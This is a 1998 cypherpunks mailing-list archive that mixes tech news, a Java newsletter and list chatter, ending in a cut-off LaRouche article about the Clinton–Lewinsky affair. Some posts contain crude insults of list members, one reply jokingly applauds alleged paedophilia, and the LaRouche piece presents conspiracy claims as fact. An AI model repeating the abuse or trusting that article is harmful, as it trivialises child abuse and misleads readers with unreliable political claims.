Date: Sat, 31 Jan 1998 12:26:40 -0500
Sender: glen@shell.ncm.com
Resent-From: 0xdeadbeef@substance.abuse.blackdown.org
X-Mailing-List: <0xdeadbeef@substance.abuse.blackdown.org> archive/latest/2692
X-Loop: 0xdeadbeef@substance.abuse.blackdown.org
Precedence: list
Resent-Sender: 0xdeadbeef-request@substance.abuse.blackdown.org


Forwarded-by: Simon Karpen <slk@acm.rpi.edu>
Forwarded-by: Rob Browning <rlb@cs.utexas.edu>
From: "Eric S. Raymond" <esr@snark.thyrsus.com>

We interrupt our normal programming to inform everybody that I'm
likely to be a bit preoccupied and/or out of touch for the next week.

The 23 Jan Netscape announcement has borne unexpected fruit.  Some of
you probably know by now that Netscape is now officially crediting my
research paper ("The Cathedral and the Bazaar", available on my site)
with having been a fundamentally important factor in their decision to
release Navigator 5.0 as freeware in source.

Life continues to get more interesting.  This coming week I'm flying
to Netscape's headquarters in Silicon Valley to meet with Netscape's
top brass and technical people.  We're going to be defining Netscape's
followup -- licensing terms, development strategy, freeware community
outreach, spreading the free-software concept.

Not only that, but arrangements are being made for me to meet with
other leading Silicon Valley CEOs whose names I am not yet at liberty to
reveal.  The mission will to convince them that the freeware-centered,
open-development strategy is the only way for them to head off total
Microsoft domination.

This is the big time, people -- the Internet free-software culture's
breakout into commercial viability at a level even Wall Street can see
is happening *now*.  And I'm involved it up to my ears.  *Gulp!*
You'll have to excuse me for being a bit distracted just now.  I've
got some preparation to do...

(Uh...anybody who still doesn't grok what the fuss is about should
surf over to <http://www.linuxresources.com> and read the story "Linux
Plays Large Role In Recent Netscape Announcement".  The "read here"
link leads to a copy of my paper on their site.  Please read it there;
my regular website host has been swamped by Web traffic and you get
only one guess why...)
--
		Eric S. Raymond

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 2 Feb 1998 02:02:00 +0800
To: cypherpunks@toad.com
Subject: Re: Need electron microscope
In-Reply-To: <3.0.2.32.19980201063304.0077ac4c@netcom10.netcom.com>
Message-ID: <Vae9Je9w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Lucky Green <shamrock@netcom.com> writes:

> I need access to an electron microscope, or better yet, a real chip
> analysis lab. This is for a serious project that would result in a
> scientific paper. Who can help?

He he he - your asshole employer (C2Net) can't afford to buy equipment,
so you need to beg on mailing lists like a pauper? He he he.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@temp0205.myriad.ml.org (Matthew Ghio)
Date: Mon, 2 Feb 1998 00:49:33 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Interesting Chemical Reaction
In-Reply-To: <199801310015.BAA00313@basement.replay.com>
Message-ID: <199802011642.LAA01517@myriad>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous wrote:

> Perpetual motion machines built on violations of thermodynamics involving
> hemispherical and ellipsoidal mirrors have been around for years.  They
> don't work.
> 
> The objects do not change temperature.

Actually, when I did this experiment several years ago, the objects did
change temperature (about 1 degree centigrade) but it may have been due
to outside light getting in.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 2 Feb 1998 02:10:53 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Electron Microscope...
Message-ID: <199802011808.MAA25278@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

I have a couple of suggestions:

 -  Try several of the science museums around the country. As a result of
    my work with Discovery Hall I know that both Chicago and the
    Exploratorium in San Fran. had working available electron microscopes.
    Course this is nearly 10 years out of date too so who knows if they
    still run them.

 -  You might also try one of the 4 schools in the US who have a certified
    Semiconductor Technology program. There is one here in Austin, one in
    Phoenix (I believe), and one somewhere in Oregon. I don't remember where
    the fourth one is. Call Intel or AMD and ask their HR or PR people
    where the schools are, they'll know.


Good luck.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 1 Feb 1998 20:25:51 +0800
To: cypherpunks@toad.com
Subject: Re: Zero-knowledge commit
Message-ID: <199802011215.NAA10211@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Timmy C[unt] May carries a turd in his wallet for identification purposes.

                  __|     \ /     |__
      _ o   ___\o    \o    |    o/    o/___  o _  Timmy C[unt] May
       /\  /)  |     ( \  /o\  / )     |  (\  /\
   ___|_\______                          _____/_|__





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 2 Feb 1998 04:14:18 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: [Fwd: JDC Newsletter Vol. 1 No. 6] (fwd)
Message-ID: <199802012012.OAA25533@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:
>From owner-alg-l@lists.io.com Sun Feb  1 12:58:25 1998
Message-ID: <34D4C68B.23866D8E@bga.com>
Date: Sun, 01 Feb 1998 13:01:32 -0600
From: Stu Green <stugreen@bga.com>
X-Mailer: Mozilla 4.03 [en] (X11; I; Linux 2.0.33 i586)
MIME-Version: 1.0
To: alg-l@lists.io.com
Subject: [Fwd: JDC Newsletter Vol. 1 No. 6]
Content-Type: multipart/mixed; boundary="------------A072E7965EF9430CF4337FE8"
Sender: owner-alg-l@lists.io.com
Precedence: bulk
Reply-To: alg-l@lists.io.com

This is a multi-part message in MIME format.
--------------A072E7965EF9430CF4337FE8
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit



--------------A072E7965EF9430CF4337FE8
Content-Type: message/rfc822
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Received: from mail1.realtime.net (mail1.realtime.net [205.238.128.217]) by zoom.bga.com (8.6.12/8.6.12) with SMTP id LAA20235 for <stugreen@bga.com>; Sun, 1 Feb 1998 11:25:12 -0600
Received: (qmail 27152 invoked from network); 1 Feb 1998 11:51:38 -0000
Received: from sunflash.com (HELO sunflash) (38.211.163.2)
  by mail1.realtime.net with SMTP; 1 Feb 1998 11:51:38 -0000
Received: from fdds.com by sunflash (SMI-8.6/SMI-SVR4)
	id GAA11545; Sun, 1 Feb 1998 06:48:56 -0500
From: JDCNewsLetter@web2.javasoft.com
Message-Id: <199802011148.GAA11545@sunflash>
To: stugreen@bga.com
Date: Sun, 1 Feb 98 06:52:30 EST
Subject: JDC Newsletter Vol. 1 No. 6


-WELCOME- to the Java(sm) Developer Connection(sm) Newsletter, covering
Early Access software releases, new products, developer programs, the 1998
JavaOne Developer Conference(sm), and more.  The JDC Team-


             J  D  C    N  E  W  S  L  E  T  T  E  R
             
             PRODUCT NEWS
                  *  Java Activator Release 2 Early Access
                  *  Java Foundation Classes(JFC) 0.7 Early Access
                  *  Java Accessibility API 0.7 Early Access
                  *  Java Cryptography Extension (JCE) 1.2 Early Access
                  *  PersonalJava(tm) Platform 1.0 Ships
                  *  JavaBeans(tm) in the News

             INSIDE THE JDC
                  *  New on the JDC
                  *  Watch for the JDC Reader Survey

            DEVELOPER PROGRAMS AND RESOURCES
                  *  Spring Internet World 98
                  *  1998 JavaOne Developer Conference
                  *  Testing Your Code to See if It's 100% Pure Java(tm)?
                  *  Secrets of Successful Java Testing 
                  *  Visit java.sun.com

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
P R O D U C T  N E W S

JAVA ACTIVATOR RELEASE 2 EARLY ACCESS.  Designed so developers can deploy
JDK(tm) 1.1-based applets for Windows and Solaris users on intranet web
pages, and provides support for both Internet Explorer 3.02 or later and
Netscape Navigator 3.0 or later.  To download, see:

http://java.sun.com/jdc/earlyAccess/index.html


JAVA FOUNDATION CLASSES(JFC) 0.7 EARLY ACCESS.  Contains the API
specification, documentation, sample code, and a demo.  The Swing 0.7
release contains improved menu implementation, significant changes to the
table and accessibility APIs, and bug fixes.  Note:  JFC supports JDK 1.1.2
or higher.  To access, see:

http://java.sun.com/jdc/earlyAccess/index.html


JAVA ACCESSIBILITY API 0.7 EARLY ACCESS.  Ensures that the Accessibility
API is easily extensible, and simplifies implementation for third-party
component developers.  Note:  This download works only with the JDK 1.1
compatible version of Swing 0.7.  To access, see:

http://java.sun.com/jdc/earlyAccess/index.html


JAVA CRYPTOGRAPHY EXTENSION (JCE) 1.2 EARLY ACCESS.  Provides a framework
for encryption and key negotiation, and includes interfaces and
implementations of secure Java streams, key generation, and symmetric,
asymmetric, block, and stream ciphers.  JCE 1.2 is designed so that other
cryptography libraries can be plugged in as service providers, and new
algorithms can be added seamlessly.  JCE 1.2 supplements JDK 1.2, which
includes interfaces and implementations of message digests and digital
signatures.  Note:  JCE 1.2 requires that JDK 1.2 be installed, and
download is restricted to the US and Canada.  For more information, see:

http://java.sun.com/jdc/earlyAccess/index.html

									 									 
PERSONALJAVA PLATFORM 1.0 SHIPS to licensees.  The PersonalJava reference
implementation software is designed specifically for network-connectable
consumer devices used for communications, entertainment, and mobile
computing.  Candidates for this Java platform include set-top boxes, mobile
hand-held computers, and Internet "web phones."  Also announced is the beta
release of Personal WebAccess, a compact web browser for devices that run
the PersonalJava platform.  For more information, see:

http://java.sun.com/pr/1998/01/pr980108.html 


JAVABEANS IN THE NEWS.  The draft specification for the Drag and Drop
Subsystem for Java Foundation Classes(JFC) is now updated to version 0.95.
For more information on JavaBeans, and to access the specification, see:

http://java.sun.com/beans
http://java.sun.com/beans/glasgow/index.html#draganddrop
 

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
I N S I D E  T H E  J D C

NEW ON THE JDC.  Technical articles covering JDK 1.2, electronic commerce,
JDC registration management, building a Web crawler, and more.  Plus, don't
miss the JDC Tech Tips with hints on StringBuffer and using javap with
.class files.  To access, see:

http://java.sun.com/jdc


WATCH FOR THE JDC READER SURVEY coming soon at the end of technical
articles.  Let the JDC Team know how you like JDC articles -- and what
topics you want covered in the future.  Plus, earn two DukeDollars for
participating.  For more information, see:

http://java.sun.com/jdc


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
D E V E L O P E R  P R O G R A M S  A N D  R E S O U R C E S

SPRING INTERNET WORLD 98.  Focusing on industry issues and trends with
emphasis on marketing, advertising, ecommerce, finance, and government.
Location and date:  Los Angeles Convention Center, March 9 to 13, 1998.
For more information see:

http://events.internet.com/spring98/spring98.html


1998 JAVAONE DEVELOPER CONFERENCE.  Be sure to attend the 1998 JavaOne
Developer Conference -- at Moscone Center in San Francisco, California,
March 24 to 27, 1998.  Leading industry speakers include Scott McNealy, CEO
of Sun Microsystems, Alan Baratz, President of Sun Microsystems'
JavaSoft(tm) Division, and James Gosling, inventor of the Java programming
language.  Conference sessions include technical tracks, an ISV track, a
business track, and more.  For details and registration, see:

http://java.sun.com/javaone


TESTING YOUR CODE TO SEE IF IT'S 100% PURE JAVA?  Use JavaPureCheck(tm),
the free utility that checks your code for you.  And if you're thinking
about getting your software certified as 100% Pure, learn why you should --
and see how easy it is.  For more information, use the following:

http://www.suntest.com/100percent
http://java.sun.com/100percent/cert.html
100percentpure-program@java.sun.com


SECRETS OF SUCCESSFUL JAVA TESTING.  Find out how to write tests once and
run them anywhere at "Secrets of Successful Java Testing" seminar, brought
to you by SunTest(tm), the Java Testing unit of Sun Microsystems(tm).  Join
your colleagues, and learn the most effective tools and techniques for
testing Java applications and applets.  Offered in 17 cities throughout the
US, Canada, and the UK.  For details, schedules, and registration, see:

http://www.suntest.com/seminars/ 


VISIT JAVA.SUN.COM.  Get the latest news and information on Java technology
on Sun's JavaSoft web site.  Read announcements, learn about new
directions, and discover products, partners, programs, and more.  To
access, see:

http://java.sun.com

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
-- Editor's Note --

The names on the JDC mailing list are used for internal Sun Microsystems
purposes only.  To remove your name from the list, see
Subscribe/Unsubscribe below.

-- Feedback --

Comments? Send your feedback on the JDC Newsletter to:

JDCNewsletter@Sun.com

-- Subscribe/Unsubscribe --

To unsubscribe from JDC Email, log in to the JDC.  Then click "Change
account information."  Type your password, and uncheck the box at the end
of the form that says "It's okay to send me JDC Email."  The JDC log-in
address is:

http://java.sun.com/jdc

-- More on Java Technology --

For the latest news and information on Java technology, see Sun's Java
technology site at the following address:

http://java.sun.com

For in-depth technical articles, tutorials, early access to software, and
more, visit the JDC at:

http://java.sun.com/jdc

-- Archives -- 

You'll find the JDC Newsletter archives at the following address:

http://java.sun.com/jdc/techDocs/newsletter/index.html

-- Copyright --

Copyright 1998 Sun Microsystems, Inc. All rights reserved.
901 San Antonio Road, Palo Alto, California 94303 USA

This document is protected by copyright. For more information, see:

http://java.sun.com/jdc/copyright.html


List management and distribution by The Email Channel.
For more information, send email to fdds@fdds.com.

JDC Newsletter 
Vol. 1 No. 6
January 27, 1998



--------------A072E7965EF9430CF4337FE8--

---
To unsubscribe send the message "unsubscribe alg-l" without quotes
to majordomo@lists.io.com
Send questions to owner-alg-l@lists.io.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Mon, 2 Feb 1998 06:27:45 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Electron Microscope...
Message-ID: <3.0.5.32.19980201141920.008a9ab0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 12:08 PM 2/1/98 -0600, Jim Choate wrote:
> -  You might also try one of the 4 schools in the US who have a certified
>    Semiconductor Technology program. There is one here in Austin, one in
>    Phoenix (I believe), and one somewhere in Oregon. I don't remember where
>    the fourth one is. Call Intel or AMD and ask their HR or PR people
>    where the schools are, they'll know.

There's also the Cornell University Sub-Micron Research Facility,
founded back when microns were still very small, with lots of IBM funds.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 1 Feb 1998 21:44:53 +0800
To: cypherpunks@toad.com
Subject: 2001 Tiger Tots
Message-ID: <199802011335.OAA19354@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



London Sunday Times
February 1, 1998

Arthur C Clarke sex scandal hits Charles's Sri Lanka visit

by Yvonne Ridley


 THE Prince of Wales's visit to Sri Lanka
 this week hit a new problem last night
 after Arthur C Clarke, the respected
 science fiction writer due to be knighted
 by Charles, allegedly confessed to being a
 paedophile.

 The investiture is due to take place on
 Wednesday during the prince's visit, which
 coincides with the celebrations for the
 50th anniversary of the island's
 independence.

 Downing Street said last night: "As far as
 we are concerned the investiture is still
 going ahead as planned." A spokesman
 refused to comment on the possibility of a
 forfeiture of the honour by the 80-year-old
 author of 2001: A Space Odyssey.

 Clarke's revelations, published in today's
 Sunday Mirror, are bound to embarrass
 Tony Blair, who named him in his first
 new year honours as prime minister.

 Last night diplomats in Colombo, the
 island's capital, were being asked to assess
 the author's tabloid confession. If the
 report is taken at face value the ceremony
 is unlikely to go ahead.

 Buckingham Palace advisers contacted
 British embassy officials in Sri Lanka this
 year to make discreet inquiries after
 rumours about Clarke's sexuality and
 private life.

 They reported that, although Clarke was
 known to be gay, there was no evidence of
 paedophilia.

 The British-born author of more than 80
 novels, who has adopted Sri Lanka as his
 home, was unable to travel to Britain to
 receive his knighthood from the Queen
 because he is virtually confined to a
 wheelchair as a result of post-polio
 syndrome.

 In 1989 he was made a CBE for his
 services to British cultural interests in Sri
 Lanka, where he enjoys a tax-free lifestyle
 bestowed on him by the island because of
 his celebrity status.

 He previously met Charles at the British
 premiere of his Odyssey film in the 1960s,
 for which he received an Oscar
 nomination.

 Surrey-born Clarke was married briefly in
 1953 to Marilyn Mayfield, an American
 who has since died. The marriage lasted
 about six months after a whirlwind affair.

 After the split Clarke moved to Sri Lanka,
 where he now lives in a luxurious home
 surrounded by state-of-the-art technology
 and computers that allow him to keep in
 touch with friends around the world.

 His study is lined with photographs of
 celebrities and admirers of his work,
 including the Pope, Diana, Princess of
 Wales, Elizabeth Taylor and the astronaut
 Neil Armstrong.

 The news also threatens to cast a shadow
 during the royal visit for senior officials
 on the island as they have always been
 proud of the eminent author's presence
 during the past 40 years. Homosexuality is
 regarded as an offence in Sri Lanka and
 carries a prison sentence of up to 10 years.

 Charles's planned trip was already marred
 last week by a terrorist attack on a temple
 that was to have been the scene of the
 independence celebrations.

 The bomb killed 17 people, including a
 suicide team who drove a truck into the
 old hill capital of Kandy.

 Buddhist leaders have called for a boycott
 of this week's ceremonies in protest at
 Charles's presence. They say Britain
 sympathises with the island's separatist
 Tamil Tiger rebels. They also claim the
 Tamil Tigers, who carried out the
 bombing, have been allowed to raise
 money in London for terrorist campaigns.
 Since the bombing some Buddhist leaders
 have intensified demands for a formal
 apology from Britain for its colonial rule.

 A Foreign Office spokesman said last
 night that he fully expected Charles's visit
 to Sri Lanka to go ahead despite the
 security fears over recent terrorist
 activities.

 A report that members of the prince's royal
 protection squad would not be allowed to
 carry guns was an "administrative point"
 that would be resolved before the party
 left, he said.

 "It is an island where there is a history of
 terrorist problems with the Tamil Tigers
 and, from time to time, with explosions
 and so forth, so not unnaturally we are
 looking very closely at security," the
 spokesman said.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Mon, 2 Feb 1998 05:02:17 +0800
To: cypherpunks@cyberpass.net
Subject: Re: 2001 Tiger Tots
In-Reply-To: <199802011335.OAA19354@basement.replay.com>
Message-ID: <199802012055.OAA15665@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain




> Arthur C Clarke sex scandal hits Charles's Sri Lanka visit

Does this mean that we will get a new edition of "2001" with naked boy
scenes? :)

Kudos to Arthur for honking the uptight homophobic British establishment,
which sees pedophile rings under every shrub and bush.  Now do you think
we could get James "The Amazing" Randi to issue a similar endorsement? 

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 2 Feb 1998 03:53:12 +0800
To: cypherpunks@toad.com
Subject: (none)
Message-ID: <199802011942.UAA02671@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Subskribe cyferpunks <billy.bob@whitehouse.gov>








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 2 Feb 1998 12:21:49 +0800
To: cypherpunks@toad.com
Subject: Re: (none)
In-Reply-To: <199802011942.UAA02671@basement.replay.com>
Message-ID: <NV79Je11w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



nobody@REPLAY.COM (Anonymous) writes:

> Subskribe cyferpunks <billy.bob@whitehouse.gov>

An old one for those who forgot it already...

If Bill is <president@whitehouse.gov>, then who's Hillary?

<root@whitehouse.gov>

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 2 Feb 1998 11:59:55 +0800
To: users@ssz.com (SSZ User Mail List)
Subject: Updated BBS listing (fwd)
Message-ID: <199802020355.VAA26725@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:
>From ravage@ssz.com Sun Feb  1 21:54:18 1998
From: Jim Choate <ravage@ssz.com>
Message-Id: <199802020354.VAA26715@einstein.ssz.com>
Subject: Updated BBS listing
To: staff@ssz.com (Armadillo Group Staff)
Date: Sun, 1 Feb 1998 21:54:17 -0600 (CST)
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 3010      


Hi,

I have updated the listing in Rasca's BBS list and it should show up in one
of the future O'Reilly 'Learning Linux' books which we've been listed in
since it was published.

                                                       Jim


-----------------------------------------------------------------------------

Hi Rasca,

I would like to update the entry for my system, Solar Soyuz Zaibatsu (SSZ).
The data that has been in the 'Learning Linux' listing has been out of date
the last couple of years. I apologize for not correcting it sooner. It's
pretty wild that we've been online in one manner or another since 1984 and
involved in Linux since late 1992.

The correct information is below:

BBS Name: Solar Soyuz Zaibatsu (ssz.com)
Phone Number: 512-451-6009 (28.8), 512-451-7060 (33.6) (account required)
Online: ?, we're on Internet full time via ISDN
Expires: ?
Modem Speed (CCITT): 28.8, 33.6
City/Country/State (include region code): Austin, US, Texas (?)
Whatever network it is on (i.e. FidoNet, etc.): Internet (ssz.com)
First Time access to D/L Linux Files (Y/N): Y (if not request mount via
                                            staff@ssz.com)
Allow File Requests - Fido style (Y/N): No, available anonymous ftp and
                                        temporary guest accounts (send
                                        request to staff@ssz.com)
Free Access to Linux Files (Y/N): Y
BBS Rating (1-5): 5 (what else?)

We also support the 'Cypherpunks Distributed Remailer' (cypherpunks@ssz.com),
'Experimental Science Instrumentation Mailing List' (tesla@ssz.com), and are
involved in the 'Austin Linux Group' (alg-l@lists.io.com). I also do
consulting via 'The Armadillo Group' (consulting@ssz.com). We still support
hobby/amateur science and technology via 'The Wired Society' (tws@ssz.com).
We currently run Linux on x86, PPC, & SPARC machines as well as Plan 9.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 2 Feb 1998 13:05:57 +0800
To: cypherpunks@toad.com
Subject: Re: Bush Gang Suspected In Assault On Presidency
In-Reply-To: <34cae887.ccs@ccs.covici.com>
Message-ID: <Jk99Je17w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Path: perun!news
From: covici@ccs.covici.com
Newsgroups: local.echorel
Subject: Bush Gang Suspected In Assault On Presidency
Message-ID: <34cae887.ccs@ccs.covici.com>
Date: Sun, 25 Jan 1998 02:23:49 -0500
Sender: news@bwalk.dm.com
Reply-To: LaRouche Issues Mailing List <lar-lst@ccs.covici.com>
Organization: Covici Computer Systems

Bush gang suspected in new assault on Presidency

by Edward Spannaus and Jeffrey Steinberg

In the midst of the worst global financial crisis in modern history, the
United States Presidency has come under renewed, vicious attack from a
combination of British and nominally ``American'' Bush-League circles.
This latest attack, which one White House official long ago
appropriately dubbed ``bimbo eruptions,'' centered around a Bush
``mole'' who was, unfortunately, allowed to operate inside the Clinton
administration, and who now enjoys high-level security clearances in her
post at the Pentagon.

Linda Tripp, the central player in the renewed assault against President
Clinton--staged around a purported sex scandal involving a young White
House intern, Monica Lewinsky--was a Bush administration employee from
1990, until Bush left office in January 1993. At the urging of senior
Bush administration officials, including Transportation Secretary Sam
Skinner, Tripp was retained by the Clinton-Gore transition team in a
clerical position, and later assigned to work at the Office of the White
House General Counsel, under Bernard Nussbaum and his deputy, Vincent
Foster. All the while, she was operating as part of a treasonous
Bush-League ``fifth column'' within the Executive branch.

While the ``Get Clinton'' media have attempted to portray Tripp as
``apolitical,'' she was, in fact, an ally, from the Bush administration
period on, of then-FBI agent Gary Aldrich, who, in 1996, wrote a
libellous book against President Clinton, {Unlimited Access: An FBI
Agent Inside the Clinton White House,} which also revolved around bogus
claims of White House sexual misconduct (see {EIR,} July 26, 1996,
p.|72.) Aldrich was another Bush-League mole inside the Clinton White
House. His embarrassingly fantasy-ridden book has been trumpetted by the
London-based Hollinger Corporation, the leading British Crown media
cartel; by its subsidiary, {American Spectator} magazine; and by ``Get
Clinton'' money-bags Richard Mellon Scaife.

Tripp emerged in 1995 as an asset of Whitewater Independent Counsel
Kenneth Starr, testifying before the Whitewater grand jury and later
before a Congressional hearing on the death of Vincent Foster. When
Lloyd Cutler replaced Nussbaum as White House General Counsel, Tripp,
who by then had been widely identified as an unabashed political enemy
of President Clinton, was reassigned to the Pentagon, where she
eventually got an $80,000-a-year job, which also involved her getting
top-level security clearances. Tripp claimed, to anyone who would
listen, that she had been transferred from the White House because she
``knew too much about Whitewater,'' a patent lie.

Commenting on the role of Tripp as the linchpin in the latest
Clintongate assault, Lyndon LaRouche called on Jan. 22 for Tripp's
security clearances to be immediately revoked, pending the outcome of a
thorough probe of her role in the sordid affair. ``She obviously needs
her security clearances immediately pulled, given her role in what has
all the earmarks of an illegal attack against the President, ostensibly
on behalf of partisan Republican forces. I would certainly hope that
there is no one in the Pentagon who would countenance such an obvious
assault against a vital American institution, the Presidency. I would
expect such treachery from the editorial page writers at the {Wall
Street Journal,} but not from our military.''


               - An earlier `eruption' -


In the summer of 1997, Tripp surfaced again as part of an effort to hit
President Clinton with a ``Profumo''-style sex scandal, telling
{Newsweek} that the President had sexually harassed a White House aide,
Kathleen Willey. Willey denied, under oath, that Tripp's allegations
were true. This prompted President Clinton's attorney, Robert Bennett,
belatedly, in August 1997, to denounce Tripp as a liar.

While working at the Pentagon, in late 1996, Tripp had already begun to
cultivate a close relationship with a former White House junior staff
aide, 22-year-old Monica Lewinsky, who had been recently transferred to
the Defense Department. It is unclear how the two women came to meet,
but in short order, Tripp began to exert a significant amount of control
over the younger woman. Tripp should be forced, under oath, to detail
the circumstance under which she met and befriended Lewinsky.

Tripp soon betrayed Lewinsky's confidence by surreptitiously--and,
probably, illegally--taping telephone conversations with Lewinsky.

By December 1997, Tripp and Lewinsky had {both,} mysteriously, been
subpoenaed to give depositions to attorneys for Paula Jones, in her
civil lawsuit against the President--a lawsuit instigated by British
intelligence operator and former London {Sunday Telegraph} Washington
correspondent Ambrose Evans-Pritchard. How Jones's attorneys came to
know of the existence of Tripp and Lewinsky is one question that may
hold a key to Tripp's role in the present attack against the President.
It should be recalled that, prior to being named the independent counsel
in Whitewater, Kenneth Starr had been paid by Richard Mellon Scaife,
through the Landmark Legal Foundation, to prepare an {amicus curiae}
brief in support of Paula Jones.

Tripp claims that, on Jan. 12, 1998, she took 20 hours of tape-recorded
conversations with Lewinsky to Whitewater Special Prosecutor Starr. The
next day, Starr arranged for Tripp to secretly tape her meeting with
Lewinsky at the Ritz Carlton Hotel near the Pentagon in Arlington,
Virginia.

At the time that Starr arranged for the FBI to secretly tape the
Tripp-Lewinsky meeting, {he had absolutely no jurisdiction to probe
President Clinton's relationship to the former White House aide.}
Indeed, it is critical that a full-scale probe be conducted, to
determine whether Tripp, who was in league with Starr from 1995, was
taping her conversations with Lewinsky on her own, or, covertly, on
behalf of Starr. At minimum, Starr vastly overstepped his jurisdiction;
far more likely, he himself broke the law--along with Tripp--in a
flagrant attempt to entrap and destroy President Clinton.


                 - No U.S. precedent -


In the 200-year history of the American Presidency, there have been
occasional sexual scandals involving top government officials; however,
never has such a personal scandal brought down the chief executive.
There is only one country in the world where heads of government are
brought to their knees through such tabloid scandal-mongering: Great
Britain. In 1963, Harold Macmillan's government was brought down by a
sex scandal involving Defense Minister John Profumo.

It is, therefore, not surprising that a review of the various
Clintongate scandals, from the 1993 so-called ``Troopergate'' affair to
the present attack, reveals that British intelligence stringer and
former {Sunday Telegraph} Washington correspondent Ambrose
Evans-Pritchard has been the chief instigator. As early as May 8, 1994,
in a {Sunday Telegraph} column, Evans-Pritchard boasted that he had been
instrumental in getting Paula Jones to file her civil suit against the
President.

Evans-Pritchard has elsewhere boasted that his assignment, on behalf of
the British Crown's Hollinger Corporation, has been nothing less than
the total destruction of the Clinton Presidency. Writing in the Jan. 22
{Daily Telegraph,} Evans-Pritchard loudly bragged of his manipulation of
Paula Jones: ``My impression after befriending her four years ago,
before she took the momentous step of suing the President, is that her
motive was sheer rage.''

``Paula Jones has now achieved her object of inflicting massive damage
on Bill Clinton, with shortening odds that she may ultimately destroy
his Presidency,'' he continued. Evans-Pritchard accuses the U.S. news
media of covering up the Clinton sex scandals, so that only the
{American Spectator} or the British press will print the stories. ``What
Paula Jones has done is to use the immense power of legal discovery to
force the scandal to the surface. She has finally done the job that the
American media failed to do so miserably.''

This was precisely the strategy that Evans-Pritchard had laid out in
